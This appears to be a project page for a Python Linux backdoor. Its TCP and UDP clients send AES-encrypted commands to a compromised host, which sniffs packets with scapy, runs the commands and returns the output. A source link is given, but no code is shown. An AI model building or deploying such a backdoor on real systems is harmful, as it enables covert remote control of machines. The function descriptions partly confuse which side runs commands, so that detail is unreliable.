Linux Packet Sniffing Backdoor.

Linux Packet Sniffing Backdoor.

Linux backdoor program to allow the “remote” use of terminal from client to the compromised machine.
Latest Change 10/19/2015:
– serverTCP.py & serverUDP.py ; Added a sleep function to allow for the crafted packets to be sent before changing to listening.

Depends:
– pip install setproctitle

+ SOURCE FILE:
– clientTCP.py : Sends data (commands) to the compromised server and receives back the output from the server.
– clientUDP.py : Sends data (commands) to the compromised server and receives back the output from the server.
– serverTCP.py : Receives the command from the client, executes it and returns the output back to the client.
– serverUDP.py : Receives the command from the client, executes it and returns the output back to the client.

clientTCP.py

clientTCP.py

with Functions :
– encryptData : Function to encrypt the passed in data string using AES with the specified encryption key and salt value.
– decryptData : Function to decrypt the passed in data string using AES with the specified decryption key and salt value.
– getCommand : Function to parse the packet object from the scapy sniff of the network traffic going to the terminal and filter it further to ensure it is the packet we are looking for from the compromised server. It will then decrypt the extracted command sent from the client. After executing that command, pipe the output to be encrypted and sent back the client.
– packetCheck : Function to check if the packet we sniffed is the right one by filtering it by the values we’ve put in our crafter packets. Returns true or false.

clientTCP.py :

clientUDP.py :

serverTCP.py :

serverUDP.py :

Source : https://github.com/JustinTom